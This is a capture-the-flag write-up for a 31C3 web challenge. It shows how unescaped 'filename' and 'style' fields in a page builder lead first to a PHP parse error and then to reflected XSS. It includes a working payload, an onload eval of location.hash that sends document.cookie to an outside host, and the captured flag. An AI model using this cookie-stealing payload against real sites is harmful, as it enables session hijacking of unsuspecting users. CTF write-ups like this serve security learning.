This challenge needs only XSS but it is interesting to me 🙂
These guys have ripped off our designs and using them in their web pages builder! We’d Haxx them, don’t worry we’ll give you decent points for it. http://188.40.18.76/
By using the form, we could generate a page.(such as http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/filename)
It htmlspecialchars the “title” and “file content” but not “style” or “filename”.
The maximum size of “style” is 8bytes and that of “filename” is 65bytes.
Then, “filename” can be foo.php and “style” can be <?php a so that it shows PHP error.
(http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/foo.php)
Parse error: syntax error, unexpected ‘” rel=”‘ (T_CONSTANT_ENCAPSED_STRING) in /var/www/html/output/19c94d778563b117e18e3442e887989aea14277d/foo.php on line 10
hmm… PHP code exeution looks difficult because maximum size of “style” is 8bytes and short_open_tag is offed. (and * is removed from “title” and “file content”)
So let’s search another vulnerability.
We can XSS with “filename”, because the error page above prints “filename” that is not escaped!
http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/%3Cbody onload=%22eval%28location.hash.slice%281%29%29%22.php#
location.href=%27http://tyage.net/%27+document.cookie
(Notice: we put the code in location.hash to fit in the maximum length of “filename”)
Now, just submit a link above in the contact form and we capture the flag!
31c3_Y0u_H4v3_F0und_My_W34k_Err0R_P01n7